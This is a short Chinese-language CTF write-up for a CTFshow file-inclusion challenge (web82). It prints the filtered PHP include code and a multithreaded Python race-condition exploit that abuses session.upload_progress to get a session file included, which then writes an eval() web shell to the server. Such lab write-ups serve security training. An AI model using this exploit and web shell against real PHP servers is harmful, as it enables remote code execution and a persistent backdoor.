CTFshow-WEB入门-文件包含web82

题目代码

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

php.ini 用 session.upload_progress 的默认配置即可

用以下方式进行POST请求时会生成 /tmp/sess_hacker 文件

session.post(url, cookies = {'PHPSESSID':sessionid}, data = {'PHP_SESSION_UPLOAD_PROGRESS':"<?php file_put_contents('/var/www/html/shell.php','<?php eval($_POST[1]);?>');?>"}, files={'file':('1.jpg',fileBytes)})

然后再文件包含sess_hacker就可以写入一句话木马了，但是因为临时文件很快就会被删除，所以要条件竞争

import io
import requests
import threading

url = 'http://xxx.challenge.ctf.show/'
sessionid = 'hacker'

def write(session): # 写入临时文件
    while True:
        fileBytes = io.BytesIO(b'a'*1024*50) # 50kb
        session.post(url, cookies = {'PHPSESSID':sessionid}, data = {'PHP_SESSION_UPLOAD_PROGRESS':"<?php file_put_contents('/var/www/html/shell.php','<?php eval($_POST[1]);?>');?>"}, files={'file':('1.jpg',fileBytes)})

def read(session):
    while True:
        session.get(url+'?file=/tmp/sess_'+sessionid) # 进行文件包含
        r = session.get(url+'shell.php') # 检查是否写入一句话木马
        if r.status_code == 200:
            print('OK')

evnet=threading.Event() # 多线程

session = requests.session()
for i in range(5):
    threading.Thread(target = write,args = (session,)).start()
for i in range(5):
    threading.Thread(target = read,args = (session,)).start()

evnet.set()